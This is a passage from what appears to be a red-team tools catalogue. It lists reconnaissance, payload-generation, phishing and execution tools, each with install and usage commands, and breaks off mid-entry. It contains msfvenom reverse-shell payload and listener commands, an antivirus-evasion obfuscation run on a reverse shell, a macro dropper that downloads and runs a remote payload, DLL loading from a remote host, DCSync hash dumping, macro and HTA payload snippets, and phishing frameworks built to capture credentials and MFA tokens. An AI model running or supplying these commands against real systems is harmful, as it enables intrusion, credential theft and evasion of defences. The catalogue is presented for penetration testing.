![image](https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png) *Image used from https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif* ### [🔙](#tool-list)[CloudBrute](https://github.com/0xsha/CloudBrute) A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). Features: - Cloud detection (IPINFO API and Source Code) - Fast (concurrent) - Cross Platform (windows, linux, mac) - User-Agent Randomization - Proxy Randomization (HTTP, Socks5) **Install:** Download the latest [release](https://github.com/0xsha/CloudBrute/releases) for your system and follow the usage. **Usage:** ```bash # Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt' CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" # Output results to file CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt ``` ![image](https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png) *Image used from https://github.com/0xsha/CloudBrute* ### [🔙](#tool-list)[dnsrecon](https://www.kali.org/tools/dnsrecon/#dnsrecon) dnsrecon is a pyhton tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search. **Install:** ```bash sudo apt install dnsrecon ``` **Usage:** ```bash dnsrecon -d google.com ``` ![image](https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png) ### [🔙](#tool-list)[shodan.io](https://www.shodan.io/dashboard) Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, IP address it is possible to discover potentially vulnerable systems relating to your target via shodan. ![image](https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png) ### [🔙](#tool-list)[AORT](https://github.com/D3Ext/AORT) Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting. **Install:** ```bash git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt ``` **Usage:** ```python python3 AORT.py -d google.com ``` ![image](https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png) ### [🔙](#tool-list)[spoofcheck](https://github.com/BishopFox/spoofcheck) A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails. Domains are spoofable if any of the following conditions are met: - Lack of an SPF or DMARC record - SPF record never specifies `~all` or `-all` - DMARC policy is set to `p=none` or is nonexistent **Install:** ```bash git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt ``` **Usage:** ```bash ./spoofcheck.py [DOMAIN] ``` ![image](https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png) ### [🔙](#tool-list)[AWSBucketDump](https://github.com/jordanpotti/AWSBucketDump) AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files. **Install:** ``` git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt ``` **Usage:** ``` usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1 ``` ### [🔙](#tool-list)[GitHarvester](https://github.com/metac0rtex/GitHarvester) Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects. **Install:** ``` git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester ``` **Usage:** ``` ./githarvester.py ``` ### [🔙](#tool-list)[truffleHog](https://github.com/dxa4481/truffleHog) TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository. **Install (Binaries):** [Link](https://github.com/trufflesecurity/trufflehog/releases) **Install (Go):** ``` git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install ``` **Usage:** ``` trufflehog https://github.com/trufflesecurity/test_keys ``` ![image](https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png) ### [🔙](#tool-list)[Dismap](https://github.com/zhzyker/dismap) Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks. Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc. **Install:** Dismap is a binary file for Linux, MacOS, and Windows. Go to [Release](https://github.com/zhzyker/dismap/releases) to download the corresponding version to run: ```bash # Linux or MacOS chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h # Windows dismap-0.3-windows-amd64.exe -h ``` **Usage:** ```bash # Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000 ``` ![image](https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png) *Image used from https://github.com/zhzyker/dismap* ### [🔙](#tool-list)[enum4linux](https://github.com/CiscoCXSecurity/enum4linux) A tool for enumerating information from Windows and Samba systems. It can be used to gather a wide range of information, including: - Domain and domain controller information - Local user and group information - Shares and share permissions - Security policies - Active Directory information **Install: (Apt)** ```bash sudo apt install enum4linux ``` **Install: (Git)** ```bash git clone https://github.com/CiscoCXSecurity/enum4linux cd enum4linux ``` **Usage:** ```bash # 'Do everything' enum4linux.pl -a 192.168.2.55 # Obtain list of usernames (RestrictAnonymous = 0) enum4linux.pl -U 192.168.2.55 # Obtain list of usernames (using authentication) enum4linux.pl -u administrator -p password -U 192.168.2.55 # Get a list of groups and their members enum4linux.pl -G 192.168.2.55 # Verbose scan enum4linux.pl -v 192.168.2.55 ``` Full usage information can be found in this [blog](https://labs.portcullis.co.uk/tools/enum4linux/). ![image](https://user-images.githubusercontent.com/100603074/210266058-bf05f272-ff05-4e97-97e9-5d11b7ae01eb.png) *Image used from https://allabouttesting.org/samba-enumeration-for-penetration-testing-short-tutorial/* ### [🔙](#tool-list)[skanuvaty](https://github.com/Esc4iCEscEsc/skanuvaty) Dangerously fast dns/network/port scanner, created by [Esc4iCEscEsc](https://github.com/Esc4iCEscEsc), written in rust. You will need a subdomains file. *E.g. [Subdomain wordlist by Sublist3r](https://raw.githubusercontent.com/aboul3la/Sublist3r/master/subbrute/names.txt)*. **Install:** Download the latest release from [here](https://github.com/Esc4iCEscEsc/skanuvaty/releases). ```bash # Install a wordlist sudo apt install wordlists ls /usr/share/dirb/wordlists ls /usr/share/amass/wordlists ``` **Usage:** ```bash skanuvaty --target example.com --concurrency 16 --subdomains-file SUBDOMAIN_WORDLIST.txt ``` ![image](https://user-images.githubusercontent.com/100603074/210856146-42a4015c-f34b-4dc6-9e9b-cbeb4a43a964.png) *Image used from https://github.com/Esc4iCEscEsc/skanuvaty* ### [🔙](#tool-list)[Metabigor](https://github.com/j3ssie/metabigor) Metabigor is Intelligence tool, its goal is to do OSINT tasks and more but without any API key. **Main Features:** - Searching information about IP Address, ASN and Organization. - Wrapper for running rustscan, masscan and nmap more efficient on IP/CIDR. - Finding more related domains of the target by applying various techniques (certificate, whois, Google Analytics, etc). - Get Summary about IP address (powered by [@thebl4ckturtle](https://github.com/theblackturtle)) **Install:** ```bash go install github.com/j3ssie/metabigor@latest ``` **Usage:** ```bash # discovery IP of a company/organization echo "company" | metabigor net --org -o /tmp/result.txt # Getting more related domains by searching for certificate info echo 'Target Inc' | metabigor cert --json | jq -r '.Domain' | unfurl format %r.%t | sort -u # this is old command # Only run rustscan with full ports echo '1.2.3.4/24' | metabigor scan -o result.txt # Reverse Whois to find related domains echo 'example.com' | metabigor related -s 'whois' # Get Google Analytics ID directly from the URL echo 'https://example.com' | metabigor related -s 'google-analytic' ``` ![image](https://user-images.githubusercontent.com/100603074/210982590-44d58bfc-3b1b-4e11-b8f3-58c5a517626d.png) *Image used from https://github.com/j3ssie/metabigor* ### [🔙](#tool-list)[Gitrob](https://github.com/michenriksen/gitrob) Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. The findings will be presented through a web interface for easy browsing and analysis. **Note:** *Gitrob will need a Github access token in order to interact with the Github API. [Create a personal access token](https://help.github.com/articles/creating-a-personal-access-token-for-the-command-line/) and save it in an environment variable in your .bashrc or similar shell configuration file:* ```bash export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef ``` **Install: (Go)** ```bash go get github.com/michenriksen/gitrob ``` **Install: (Binary)** A [precompiled version](https://github.com/michenriksen/gitrob/releases) is available for each release. **Usage:** ```bash # Run against org gitrob {org_name} # Saving session to a file gitrob -save ~/gitrob-session.json acmecorp # Loading session from a file gitrob -load ~/gitrob-session.json ``` ![image](https://user-images.githubusercontent.com/100603074/210982754-fb70db8f-0e0f-4c31-962f-ac89edc7e64a.png) *Image used from https://www.uedbox.com/post/58828/* ### [🔙](#tool-list)[gowitness](https://github.com/sensepost/gowitness) Gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line, with a handy report viewer to process results. Both Linux and macOS is supported, with Windows support mostly working. **Install: (Go)** ```bash go install github.com/sensepost/gowitness@latest ``` Full installation information can be found [here](https://github.com/sensepost/gowitness/wiki/Installation). **Usage:** ```bash # Screenshot a single website gowitness single https://www.google.com/ # Screenshot a cidr using 20 threads gowitness scan --cidr 192.168.0.0/24 --threads 20 # Screenshot open http services from an namp file gowitness nmap -f nmap.xml --open --service-contains http # Run the report server gowitness report serve ``` Full usage information can be found [here](https://github.com/sensepost/gowitness/wiki/Usage). ![image](https://user-images.githubusercontent.com/100603074/212204666-d7dcac1b-0f1a-46b8-8938-d2e122c1436c.png) *Image used from https://github.com/sensepost/gowitness* Resource Development ==================== ### [🔙](#tool-list)[Chimera](https://github.com/tokyoneon/Chimera) Chimera is a PowerShell obfuscation script designed to bypass AMSI and antivirus solutions. It digests malicious PS1's known to trigger AV and uses string substitution and variable concatenation to evade common detection signatures. **Install:** ```bash sudo apt-get update && sudo apt-get install -Vy sed xxd libc-bin curl jq perl gawk grep coreutils git sudo git clone https://github.com/tokyoneon/chimera /opt/chimera sudo chown $USER:$USER -R /opt/chimera/; cd /opt/chimera/ sudo chmod +x chimera.sh; ./chimera.sh --help ``` **Usage:** ```bash ./chimera.sh -f shells/Invoke-PowerShellTcp.ps1 -l 3 -o /tmp/chimera.ps1 -v -t powershell,windows,\ copyright -c -i -h -s length,get-location,ascii,stop,close,getstream -b new-object,reverse,\ invoke-expression,out-string,write-error -j -g -k -r -p ``` ![image](https://user-images.githubusercontent.com/100603074/209867736-5c35cec0-9227-4f18-a439-a5c954342818.png) ### [🔙](#tool-list)[msfvenom](https://www.offensive-security.com/metasploit-unleashed/Msfvenom/) Msfvenom allows the creation of payloads for various operating systems in a wide range of formats. It also supports obfuscation of payloads for AV bypass. **Set Up Listener** ```shell use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST your-ip set LPORT listening-port run ``` #### Msfvenom Commands **PHP:** ```bash msfvenom -p php/meterpreter/reverse_tcp lhost =192.168.0.9 lport=1234 R ``` **Windows:** ```bash msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe ``` **Linux:** ```bash msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell-x86.elf ``` **Java:** ```bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp ``` **HTA:** ```bash msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.3 lport=443 -f hta-psh > shell.hta ``` ![image](https://user-images.githubusercontent.com/100603074/192070870-2e65fc9f-6534-42e2-af27-9d8b54a82f0b.png) ### [🔙](#tool-list)[Shellter](https://www.shellterproject.com/) Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created. It can be used in order to inject shellcode into native Windows applications (currently 32-bit applications only). Shellter takes advantage of the original structure of the PE file and doesn’t apply any modification such as changing memory access permissions in sections (unless the user wants), adding an extra section with RWE access, and whatever would look dodgy under an AV scan. Full README information can be found [here](https://www.shellterproject.com/Downloads/Shellter/Readme.txt). **Install: (Kali)** ```bash apt-get update apt-get install shellter ``` **Install: (Windows)** Visit the [download page](https://www.shellterproject.com/download/) and install. **Usage:** Just pick a legit binary to backdoor and run Shellter. Some nice tips can be found [here](https://www.shellterproject.com/tipstricks/). Lots of community usage demos can be found [here](https://www.shellterproject.com/shellter-community-demos/). ![image](https://user-images.githubusercontent.com/100603074/216729343-612cde48-0ce1-48e6-b342-5252193a974c.png) *Image used from https://www.kali.org/tools/shellter/images/shellter.png* ### [🔙](#tool-list)[Freeze](https://github.com/optiv/Freeze) Freeze is a payload creation tool used for circumventing EDR security controls to execute shellcode in a stealthy manner. Freeze utilizes multiple techniques to not only remove Userland EDR hooks, but to also execute shellcode in such a way that it circumvents other endpoint monitoring controls. **Install:** ```bash git clone https://github.com/optiv/Freeze cd Freeze go build Freeze.go ``` **Usage:** ``` -I string Path to the raw 64-bit shellcode. -O string Name of output file (e.g. loader.exe or loader.dll). Depending on what file extension defined will determine if Freeze makes a dll or exe. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. -encrypt Encrypts the shellcode using AES 256 encryption -export string For DLL Loaders Only - Specify a specific Export function for a loader to have. -process string The name of process to spawn. This process has to exist in C:\Windows\System32\. Example 'notepad.exe' (default "notepad.exe") -sandbox Enables sandbox evasion by checking: Is Endpoint joined to a domain? Does the Endpoint have more than 2 CPUs? Does the Endpoint have more than 4 gigs of RAM? -sha256 Provides the SHA256 value of the loaders (This is useful for tracking) ``` ![image](https://user-images.githubusercontent.com/100603074/216729312-6e03f5d2-29a7-4190-8187-daecebfc6a9c.png) *Image used from https://www.blackhatethicalhacking.com/tools/freeze/* ### [🔙](#tool-list)[WordSteal](https://github.com/0x09AL/WordSteal) This script will create a Microsoft Word Document with a remote image, allowing for the capture of NTML hashes from a remote victim endpoint. Microsoft Word has the ability to include images from remote locations, including a remote image hosted on an attacker controlled SMB server. This gives you the opportunity to listen for, and capture, NTLM hashes that are sent when an authenticated victim opens the Word document and renders the image. **Install:** ``` git clone https://github.com/0x09AL/WordSteal cd WordSteal ``` **Usage:** ```bash # Generate document containing 'test.jpg' and start listener ./main.py 127.0.0.1 test.jpg 1 # Generate document containing 'test.jpg' and do not start listener ./main.py 127.0.0.1 test.jpg 0\n ``` ![image](https://user-images.githubusercontent.com/100603074/217653886-09bf9eba-a117-47b9-99b4-12fb2d73ef44.png) *Image used from https://pentestit.com/wordsteal-steal-ntlm-hashes-remotely/* ### [🔙](#tool-list)[NTAPI Undocumented Functions](http://undocumented.ntinternals.net/) This site provides information on undocumented Windows internals, system calls, data structures, and other low-level details of the Windows operating system. It can be a valuable resource for individuals who want to explore the internals of Windows for various purposes, including vulnerability analysis, exploit development, and privilege escalation. When developing exploits, understanding the internals of the target system is crucial. This site can help develop exploits by leveraging the low-level undocumented aspects of Windows. **Usage:** Visit [http://undocumented.ntinternals.net/](http://undocumented.ntinternals.net/) ![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/41b424f3-053c-440b-b0fd-235e95980d9a) *Image used from http://undocumented.ntinternals.net/* ### [🔙](#tool-list)[Kernel Callback Functions](https://codemachine.com/articles/kernel_callback_functions.html) This technical note provides a comprehensive list all the APIs exported by the Windows Kernel, for driver writes to register callback routines that are invoked by kernel components under various circumstances. Most of these routines are documented in the Windows Driver Kit (WDK) but some of them are for use by in-box drivers. The undocumented functions are described briefly whereas the documented ones are just listed here for reference. **Usage:** Visit [https://codemachine.com/articles/kernel_callback_functions.html](https://codemachine.com/articles/kernel_callback_functions.html) ![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/b7532b7d-1abc-4af6-be92-f6f78d24a788) *Image used from https://codemachine.com* ### [🔙](#tool-list)[OffensiveVBA](https://github.com/S3cur3Th1sSh1t/OffensiveVBA) A collection of offensive techniques, scripts and useful links for achieving code execution and defense evasion via office macros. **Usage:** Visit [https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo](https://github.com/S3cur3Th1sSh1t/OffensiveVBA#templates-in-this-repo) ![image](https://github.com/A-poc/RedTeam-Tools/assets/100603074/7f7ad942-48d7-42e7-a3cc-55ec84139058) *Image used from https://github.com/S3cur3Th1sSh1t* ### [🔙](#tool-list)WSH **Creating payload:** ```vbs Set shell = WScript.CreateObject("Wscript.Shell") shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True ``` **Execute:** ```bash wscript payload.vbs cscript.exe payload.vbs wscript /e:VBScript payload.txt //If .vbs files are blacklisted ``` ### [🔙](#tool-list)HTA **Creating payload:** ```html <html> <body> <script> var c= 'cmd.exe' new ActiveXObject('WScript.Shell').Run(c); </script> </body> </html> ``` **Execute:** Run file ### [🔙](#tool-list)VBA **Creating payload:** ```python Sub calc() Dim payload As String payload = "calc.exe" CreateObject("Wscript.Shell").Run payload,0 End Sub ``` **Execute:** Set function to Auto_Open() in macro enabled document Initial Access ==================== ### [🔙](#tool-list)[Bash Bunny](https://shop.hak5.org/products/bash-bunny) The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures. [hackinglab: Bash Bunny – Guide](https://hackinglab.cz/en/blog/bash-bunny-guide/) [Hak5 Documentation](https://docs.hak5.org/bash-bunny/) [Nice Payload Repo](https://github.com/hak5/bashbunny-payloads) [Product Page](https://hak5.org/products/bash-bunny) ![image](https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png) ### [🔙](#tool-list)[EvilGoPhish](https://github.com/fin3ss3g0d/evilgophish) evilginx2 + gophish. (GoPhish) Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. (evilginx2) Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication **Install:** ```bash git clone https://github.com/fin3ss3g0d/evilgophish ``` **Usage:** ``` Usage: ./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool> - root domain - the root domain to be used for the campaign - subdomains - a space separated list of evilginx2 subdomains, can be one if only one - root domain bool - true or false to proxy root domain to evilginx2 - redirect url - URL to redirect unauthorized Apache requests - feed bool - true or false if you plan to use the live feed - rid replacement - replace the gophish default "rid" in phishing URLs with this value - blacklist bool - true or false to use Apache blacklist Example: ./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false ``` ![image](https://user-images.githubusercontent.com/100603074/191007680-890acda1-72ec-429e-9c91-b2cae55d7189.png) ### [🔙](#tool-list)[Social Engineer Toolkit (SET)](https://github.com/IO1337/social-engineering-toolkit) This framework is great for creating campaigns for initial access, 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'. **Install:** ```bash git clone https://github.com/IO1337/social-engineering-toolkit; cd set; python setup.py install ``` **Usage:** ```bash python3 setoolkit ``` ![image](https://user-images.githubusercontent.com/100603074/191690233-e1f4255a-514e-4887-94da-b8a3396025f0.png) ### [🔙](#tool-list)[Hydra](https://github.com/vanhauser-thc/thc-hydra) Nice tool for logon brute force attacks. Can bf a number of services including SSH, FTP, TELNET, HTTP etc. **Install:** ```bash sudo apt install hydra ``` **Usage:** ```bash hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error" hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh ``` ![image](https://user-images.githubusercontent.com/100603074/193459614-365876d5-09da-4f29-b850-0480944f0097.png) ### [🔙](#tool-list)[SquarePhish](https://github.com/secureworks/squarephish) SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See [PhishInSuits](https://github.com/secureworks/PhishInSuits) for more about OAuth Device Code flow for phishing attacks). Attack Steps: - Send malicious QR code to victim - Victim scans QR code with mobile device - Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process) - Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer) - Attacker polls for authentication - Victim enters code into legit Microsoft website - Attacker saves authentication token **Install:** ```bash git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt ``` **Note:** *Before using either module, update the required information in the settings.config file noted with `Required`.* **Usage (Email Module):** ``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging -e EMAIL, --email EMAIL victim email address to send initial QR code email to ``` **Usage (Server Module):** ``` usage: squish.py server [-h] [-c CONFIG] [--debug] optional arguments: -h, --help show this help message and exit -c CONFIG, --config CONFIG squarephish config file [Default: settings.config] --debug enable server debugging ``` ![image](https://user-images.githubusercontent.com/100603074/208217359-70e3ebd4-5cbf-40b9-9e4b-ca1608e4422f.png) ### [🔙](#tool-list)[King Phisher](https://github.com/securestate/king-phisher) King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information. It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, atackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks. **Install (Linux - Client & Server):** ```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \ sudo bash ./install.sh ``` **Usage:** Once King Phisher has been installed please follow the [wiki page](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) to setup SSH, Database config, SMTP server etc. ![image](https://user-images.githubusercontent.com/100603074/208217377-a6d36613-4ffe-486d-a630-99ed1bb7ed2d.png) Execution ==================== ### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder) Responder is a tool for poisoning the LLMNR and NBT-NS protocols on a network, to allow for credential capture and arbitrary code execution. The LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) protocols are used by Windows systems to resolve hostnames to IP addresses on a local network. If a hostname cannot be resolved using these protocols, the system will broadcast a request for the hostname to the local network. Responder listens for these broadcasts and responds with a fake IP address, tricking the requesting system into sending its credentials to the attacker. **Install:** ```bash git clone https://github.com/SpiderLabs/Responder#usage cd Responder ``` **Usage:** ```bash # Running the tool ./Responder.py [options] # Typical usage ./Responder.py -I eth0 -wrf ``` Full usage information can be found [here](https://github.com/SpiderLabs/Responder#usage). ![image](https://user-images.githubusercontent.com/100603074/210266150-b9cbd4a0-d07b-435a-8fa9-bc0b88d2c6ae.png) *Image used from https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/* ### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py) A utility that is part of the Impacket library that can be used to extract password hashes and other secrets from a Windows system. It does this by interacting with the Security Account Manager (SAM) database on the system and extracting the hashed passwords and other information, such as: - Password hashes for local accounts - Kerberos tickets and keys - LSA Secrets **Install:** ```bash python3 -m pip install impacket ``` **Usage:** ```bash # Extract NTLM hashes with local files secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL # DCSync attack and dump the NTLM hashes of all domain users. secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected] ``` ![image](https://user-images.githubusercontent.com/100603074/210266110-8f60d6e8-009a-4dea-9e33-8a712aeaf2ac.png) *Image used from https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy* ### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm) Evil-WinRM is a tool that provides a command line interface for Windows Remote Management (WinRM: *A service that allows administrators to remotely execute commands on a Windows machine*). Evil-WinRM allows an attacker to remotely connect to a Windows machine using WinRM and execute arbitrary commands. Some features include: - Loading in memory Powershell scripts - Loading in memory dll files bypassing some AVs - Loading x64 payloads - Pass-the-hash support - Uploading and downloading local and remote files **Install: (Git)** ```bash sudo gem install winrm winrm-fs stringio logger fileutils git clone https://github.com/Hackplayers/evil-winrm.git cd evil-winrm ``` **Install: (Ruby gem)** ```bash gem install evil-winrm ``` Alternative installation instructions can be found [here](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods). **Usage:** ```bash # Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/' # Upload local files to victim upload local_filename upload local_filename destination_filename # Download remote files to local machine download remote_filename download remote_filename destination_filename # Execute .Net assembly into victim memory Invoke-Binary /opt/csharp/Rubeus.exe # Load DLL library into victim memory Dll-Loader -http http://10.10.10.10/SharpSploit.dll ``` Full usage documentation can be found [here](https://github.com/Hackplayers/evil-winrm#documentation). ![image](https://user-images.githubusercontent.com/100603074/210266192-ad53c125-7b3b-4a91-89c1-01c42cb21ef3.png) *Image used from https://korbinian-spielvogel.de/posts/heist-writeup/* ### [🔙](#tool-list)[Donut](https://github.com/TheWover/donut/) A tool for in-memory execution of VBScript, JScript, EXE, DLL files and dotNET assemblies. It can be used to load and run custom payloads on target systems without the need to drop files to disk. **Install: (Windows)** ```bash git clone http://github.com/thewover/donut.git ``` To generate the loader template, dynamic library donut.dll, the static library donut.lib and the generator donut.exe. Start an x64 Microsoft Visual Studio Developer Command Prompt, change to the directory where you cloned the Donut repository and enter the following: ```bash nmake -f Makefile.msvc ``` To do the same, except using MinGW-64 on Windows or Linux, change to the directory where you cloned the Donut repository and enter the following: ```bash make -f Makefile.mingw ``` **Install: (Linux)** ```bash pip3 install donut-shellcode ``` **Usage:** ```bash # Creating shellcode from an XSL file that pops up a calculator. shellcode = donut.create(file=r"C:\\Tools\\Source\\Repos\\donut\\calc.xsl") # Creating shellcode from an unmanaged DLL. Invokes DLLMain. shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll") ``` For full usage information, see the donut [GitHub Page](https://github.com/TheWover/donut/#4-usage). See [a recent blog post](https://thewover.github.io/Bear-Claw/) from The Wover for more info. ![image](https://user-images.githubusercontent.com/100603074/210077893-9d42cc2f-0ea0-414f-8103-42e29429321b.png) ### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack) A tool used to automatize the obfuscation and generation of Office documents, VB scripts, shortcuts, and other formats for red teaming. **Install: (Binary)** 1. Get the latest binary from [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/) 2. Download binary on PC with genuine Microsoft Office installed. 3. Open console, CD to binary dir and call the binary **Install: (Git)** ```bash git clone https://github.com/sevagas/macro_pack.git cd macro_pack pip3 install -r requirements.txt ``` **Usage:** ```bash # Help Page python3 macro_pack.py --help # List all supported file formats macro_pack.exe --listformats # Obfuscate the vba file generated by msfvenom and puts result in a new VBA file. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba # Obfuscate Empire stager VBA file and generate a MS Word document: macro_pack.exe -f empire.vba -o -G myDoc.docm # Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe) echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm" # Execute calc.exe via Dynamic Data Exchange (DDE) attack echo calc.exe | macro_pack.exe --dde -G calc.xslx ``` ![image](https://user-images.githubusercontent.com/100603074/209868800-7fbcfdec-8ae8-4693-8438-feebc2309667.png) ### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit) A collection of PowerShell scripts and modules that can be used to achieve a variety of red teaming objectives. Some of the features of PowerSploit: - Dump password hashes and extract clear-text passwords from memory - Escalate privileges and bypass security controls - Execute arbitrary PowerShell code and bypass execution restrictions - Perform network reconnaissance and discovery - Generate payloads and execute exploits **Install:** *1. Save to PowerShell modules folder* First you will need to download the [PowerSploit Folder](https://github.com/PowerShellMafia/PowerSploit) and save it to your PowerShell modules folder. Your PowerShell modules folder path can be found with the following command: ``` $Env:PSModulePath ``` **Install:** *2. Install PowerSploit as a PowerShell module* You will then need to install the PowerSploit module (use the name of the downloaded folder). **Note:** *Your PowerShell execution policy might block you, to fix this run the following command.* ``` powershell.exe -ep bypass ``` Now you can install the PowerSploit module. ``` Import-Module PowerSploit ``` **Usage:** ``` Get-Command -Module PowerSploit ``` ![image](https://user-images.githubusercontent.com/100603074/210267625-3135de58-df26-4e0a-9de4-741ad37d2eb9.png) ### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus) A tool that can be used to perform various actions related to Microsoft Active Directory (AD) environments, such as dumping password hashes, creating/deleting users, and modifying user properties. Some of the features of Rubeus: - Kerberoasting - Golden ticket attacks - Silver 